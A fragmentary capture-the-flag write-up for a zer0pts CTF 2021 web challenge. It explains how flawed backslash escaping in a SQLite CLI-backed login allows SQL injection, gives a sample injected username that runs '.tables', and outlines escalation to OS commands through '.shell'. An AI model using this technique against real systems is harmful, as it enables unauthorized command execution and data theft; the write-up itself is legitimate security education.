zer0pts CTF 2021
web
templates/index.html
as below. To obtain the flag, you need to be logged in as admin
, or read the content of the template file./login
seems to be prevented by escaping it.subprocess.Popen
even though Python supports sqlite3
module.sqlite3_escape
escapes characters except for _.\sa-zA-Z0-9
by prepending backslashes. However, in SQLite3, you need to escape '
and "
in a string literal by putting the same character twice instead of prepending backslashes.
Because of this behavior, when you input "
as username
in /login
, it breaks SQL structure.
By breaking SQL structure, you can insert some characters after "
. It is important that you can also use LF (U+000A) because in CLI version of SQLite3, by combinating "
and ;
, you can end SQL statement and then execute next query or SQLite3 commands. For example, if you input ";\n.tables\n
as username, you can execute .tables
command as below.
However, as you can see in the code as below, if there is any output to stderr, you cannot retrieve the output to stdout.
Let's find some useful commands to bypass this restriction. Looking through .help
command, you can find .shell
command, which can be used to execute OS commands.
Although there is a limit on the length of username, you can bypass it by writing payload to somewhere under /tmp
character by character and executing the script as below.